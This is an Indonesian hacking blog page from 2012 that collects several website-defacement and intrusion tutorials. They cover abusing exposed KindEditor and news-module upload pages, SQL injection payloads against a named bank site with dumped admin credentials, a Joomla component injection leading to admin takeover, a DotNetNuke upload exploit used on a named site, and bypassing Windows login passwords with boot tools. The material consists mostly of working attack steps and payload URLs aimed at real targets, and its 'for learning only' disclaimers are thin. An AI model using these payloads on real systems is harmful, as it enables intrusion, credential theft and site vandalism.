Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Rabu, 29 Agustus 2012

Cara Deface Web Dengan Teknik Web KindEditor

 




Cara Deface Web Dengan Teknik Web KindEditor - askum , kali ini kita bicara tentang deface lagi, yaitu dengan teknik web kindeditor , trik ini adalah trik paling mudah untuk ngedeface web , kita hanya perlu mengupload file html kita ke website korban , trik ini terbilang mudah gak percaya ? langsung saja simak

Berikut Langkah - Langkah Cara Deface Web Dengan Teknik Web KindEditor

1. Siapkan File Deface .html
2. ketikkan inurl:examples/uploadbutton.html di google
 

3. buka salah satu web nya , cth http://staic.qefeng.com/Kindeditor/examples/uploadbutton.html
 

4. klik upload , dan cari lokasi file deface anda .html 
5. ketika selesai , copy url yng ad di upload buton dan paste di address bar ,
cth 
web awal http://staic.qefeng.com/Kindeditor/examples/uploadbutton.html 
hasil upload /Kindeditor/attached/file/20120830/20120830125223_17605.html
 


mudah bukan  ? selamat ngedeface


Sumber : http://myhafiezers.blogspot.com/2012/08/cara-deface-web-dengan-teknik-web.html

Selasa, 28 Agustus 2012

Hack Website menggunakan SQL injection

Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :

1. Menemukan target

Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.

N0LDR
“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”

Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):

Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010

Dari sekian banyak calon korban, maka:
http://www.bankpapua.com/kantor.php?jenis=2
merupakan target saya pada tutorial sederhana ini.

N0LDR
“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”


2. Mencari celah kelemahan

Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.

(-) ditambahkan sebelum item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=-2
(‘) ditambahkan sesudah item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=2’

Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118


3. Mendapatkan jumlah kolom

Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:

http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--
.
.
.
Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.

http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--

Kita mendapatkan error:


Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)


4. Mendapatkan angka keberuntungan

Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:


http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--

[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.


5. Mendapatkan versi database server

Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:

http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--

Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.


6. Mendapatkan nama tabel

Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--

Kita mendapatkan nama-nama tabel sebagai berikut:
adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,
galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,
polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:

http://www.dolcevie.com/js/converter.html

kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)


7. Mendapatkan nama kolom

Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--

0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:
ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.


8. Mendapatkan Data

Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--

Kita mendapatkan:

webmaster:    †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz
sdm:         †¥²¯d”¥´¹¥•¨±uvw
sekper:           †¥²¯d”¥´¹¥•©¯´©¶uvw

Terenkripsi   Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/

N0LDR
“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”
sumber : jasakom.com

Cara Hack Password Admin/User Windows 7 dan Windows XP

Halo agan-agan 
Gw mau berbagi ilmu tentang cara membobol password admin / user buat di Windows XP maupun Windows 7 
Yg agan butuhin buat ngehack kagak banyak kok; 1 batang usb flashdisk minimal 1 gb, dan sebuah software bernamaUSB_Password_Resetter. Untuk softwarenya silakan agan download dulu di sini.
Langkah-langkahnya:

  1. Extract dulu filenya, setelah diextract akan muncul sebuah folder yg di dalamnya terdapat sembilan buah file.
  2. Copy sembilan file tsb ke dalam space utama USB flashdisk lo. Jangan dimasukin ke dalam folder / directory!
  3. Install file "syslinux" ke dalam USB, dengan cara:
    1. Buka command prompt (Start\All Programs\Accessories\Command Prompt)
    2. Ketik f: lalu tekan enter
    3. Ketik syslinux.exe -ma f: lalu tekan enter
    4. Untuk langkah 2 dan 3, ganti huruf f tsb dengan nama drive USB lo. Misal, jika USB lo dikenali sebagai drive G, maka pada langkah kedua dan ketiga huruf diganti menjadi huruf g.
  4. Cabut USB flashdisknya, dan masukin tuh flashdisk ke dalam PC yg mau dihack passwordnya (PC dalam keadaan mati)
  5. Nyalakan PC tsb. Buatlah agar PC tsb booting menggunakan USB lo dengan menekan F4 atau F10 atau F11 atau apalah, setiap PC beda-beda, lo cobain aja satu-satu
  6. Kalo udah berhasil booting pake USB, akan muncul tampilan kaya gambar dibawah.Lo bakal disuruh milih di mana letak sistem windows. Dalam contoh ini, windows terletak pada pilihan drive kedua.


     
  7. "2" lalu tekan enter.
  8. Setelah itu akan muncul tampilan seperti gambar di bawah.


     
  9. Tekan enter saja.
  10. Kemudian lo dikasih pilihan apa yg lo mau lakuin. Dalam contoh ini kita akan me-reset password.

     
  11. Ketik "1" lalu tekan enter.
  12. Kemudian pilih "Edit user data and passwords


     
  13. "Ketik "1" lalu tekan enter.
  14. Berikutnya, kita ditunjukkan sebuah tabel yg berisi daftar nama user beserta apakah tuh user admin ato bukan.Ketikan nama user yg pengen lo edit. Dalam contoh ini, gw mau ngedit user yg bernama "WS Training"


     
  15. Ketik "WS Training" (dalam contoh ini) lalu tekan enter.
  16. Selanjutnya lo dikasih pilihan apa yg akan lo lakuin terhadap user tsb:
    1. Clear User Password
    2. Edit User Password
    3. Promote User
    4. Unlock & Enable User AccountKalo berdasar pengalaman gw, gw saranin lo pilih yg nomer 1 atau 2 aje, habis yg nomer 3 dan 4 ada kemungkinannya gagal. Meskipun, dalam contoh ini gw mau ngehapus password yg udah ada (nomer 1)


       
    5. Ketik "1" lalu tekan enter.
  17. Akan ada pemberitahuan "Password Cleared!


     
  18. "Ketik "!" lalu tekan enter.
  19. Akan muncul tampilan seperti gambar di bawah.


     
  20. Ketik "q" lalu tekan enter.
  21. Akan muncul tampilan seperti gambar di bawah.


     
  22. Ketik "y" lalu tekan enter.
  23. Akan ada pemberitahuan *****Edit Complete*****


     
  24. Tekan enter saja.
  25. Tekan Ctrl + Alt + Del (Untuk restart PC lo), dan cabut USB lo.

Sekarang coba buka user yg udah lo edit tadi, passwordnya hilang gan! 

Sabtu, 11 Agustus 2012

Hacking Administrator Joomla – Get Full Access!

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge
Finding Exploit And Target
Those two steps could go in different order, depend what you find first target or exploit…
Google dork: inurl:”option=com_idoblog”

At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

Image


==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users–
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users–
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’
Go to:

Code: Select all
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22


Site load normally…
Go to:

Code: Select all
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62


Site content blog Profile Admin
Go to:

Code: Select all
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--


Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy

Code: Select all
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62


Image


Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

Image


username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
Code: Select all
http://www.site.com/index.php?option=com_user&view=reset


This is standard Joomla! query for password reset request
Image


Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

Image


username: admin
activation: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

Image


If you done everything ok, Rest your Password page will load. Enter your new password…
After that go to:

Code: Select all
http://www.site.com/administrator/


Standard Joomla portal content management system
Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

Image


To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

Image


:nikmat: :nikmat: :nikmat: :nikmat: :nikmat: :nikmat: :nikmat:


Sumber : http://devilzc0de.org/forum/thread-15169.html

Senin, 30 Juli 2012

Cara dan Langkah Mendeface Web



Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down. Untuk dapat melakukan web deface, defacer melakukan beberapa tahap sebagai berikut :

  • Mencari kelemahan pada sistem security, menemukan celah yang dapat dimasuki untuk melakukan eksplorasi di server target. Dia akan melakukan scanning tentang sistem operasi, service pack, service yang enable, port yang terbuka, dan lain sebagainya. Kemudian dianalisa celah mana yang bisa dimasuki.
  • Melakukan penyusupan ke server korban. Teknik ini dia akan menggunakan beberapa tools, file yang akan disisipkan, file exploit yang dibuat sengaja untuk di-copy-kan. Setelah berhasil masuk , tangan-tangan defacer bisa mengobok-obok isi server.

ok.., setelah sedikit memahami apa itu deface, mari kita coba bagai mana cara mendeface sebuahh web:
1. buka google dan masukan dork : allinurl:/content.php?module=berita. dan carilah target. (sebagai contoh target saya adalah :
 
2. setelah mendapatkan target, ganti URL nya ex : http://rskh.000space.com/admin/content.php?module=berita, ternyata walau bukan admin kita bisa menambahkan berita diweb tersebut..
 
3. klik tambah dan isi datanya, dan pada gambar pilih berkas yang akan anda upload (ingat bukan file gambar yang nantinya di upload, tapi sebuah file php untuk upload file). untuk file 404.php dapat anda download disini 
 
4. setelah berhasil buka dengan menggunakan URL : http://target.com/admin/foto_berita/404.php, atau pada artikel ini seperti ini http://rskh.000space.com/admin/foto_berita/404.php, maka akan tampil seperti dibawah :
5. wah, tampak keliatan filenya error, tapi tenang dulu...,ditengah-tengah tampilan ternyata ada sebuah TextBox untuk input Password, nah pada TextBox tersebut masukan Password : sanas. lalu tekan Enter. maka akan tampil seperti dibawah ini :
 
6. langkah selanjutnya buat sebuah file bebas untuk merubah tampilan depan web dengan syarat file tersebut dengan nama index.php (khusus web yang menggunakan PHP), dan setelah file yang kita buat jadi, lalu kita upload, dengan cara memilih menu sql.
 
7. Pada tampilan diatas Change Dir harus lah pada /htdocs/, lalu pada Upload File (pilih file yang ada telah buat). 
langkah deface sebuah web telah selesai, mudah bukan...,hehehe.....
untuk melihat hasil buka web yang anda telah deface ex : http://rskh.000space.com (itu klo blm di deface lg sama orang lain :D)


NB :
SEGALA BENTUK KERUGIAN YANG DIAKIBATKAN DARI PENGAPLIKASIAN ARTIKEL INI MENJADI SEPENUHNYA TANGGUNG JAWAB ANDA, ARTIKEL INI HANYALAH SEBAGAI MEDIA PEMBELAJARAN.
Tidak adil rasanya jika hanya membahas deface, tapi bagaimana cara atau antisipasinya.
bagi para admin web coba Patch ulang web anda (khusus kasus ini), caranya :
 
PATCH
untuk memperbaiki bugs pada web yang mempunyai bug  bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
  echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}

dan menambahkan penggalan kode yang sama di file /admin/aksi.php
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
  echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}  
Sekian dari saya.. kalau ada yang kurang mohon maaf.

Bypass Password Windows XP & Windows 7

Pada artikel ini saya akan berbagi sedikit pengalaman saya saat keingin tahuan merajai jiwa yaitu cara mem-By Pass Password Windows XP & Windows 7 .

Langsung saja ya, siapkan peralatannya, disini kita memakai Hiren Boot V 10.6 dan silahkan didownload:
HIREN BOOT V 10.6

Download Hiren

Kita hanya butuh 1 software aplikasi untuk membantu pekerjaan kita, Hiren Boot V 10.6 ini kurang lebihnya mempunyai size 200MB, cukup ringan bukan? Tapi jangan tanya lagi, ada banyak manfaatnya. Dijamin tidak akan rugi download file 200MB ini :D
Kalau sudah sobat download silahkan Burn ke CD file Hirennya,dan ikuti langkah ini :

LANGKAH PERTAMA
Restart komputer target dan masuk BIOS.
Lalu setting pada bagian Boot Device Prioritynya ubah ke CD, ini dilakukan karena kita ingin booting lewat CD Hiren tadi, sekiranya seperti gambar dibawah ini:


 
LANGKAH KEDUA
Masih dihalaman BIOS. Lalu masukan CD hiren yang telah di Burn tadi, lalu tekan F10 dan ENTER.

LANGKAH KETIGA
Setelah booting ke CD maka akan tampil seperti dibawah ini :


LANGKAH KEEMPAT
Pilih “Kon Boot” dengan cara arahkan pada Kon Boot lalu tekan Enter,tunggu beberapa detik dan akan keluar tampilan seperti dibawah ini :


LANGKAH KELIMA
Tunggu beberapa detik lagi dan taraaa kita bisa masuk windows tanpa password.
Selamat sobat telah berhasil masuk windows yang terpassword tanpa harus menggunakan password untuk login :)

Sabtu, 28 Juli 2012

Hack Website Lewat HP

Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.
Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-


Sumber : www.binushacker.net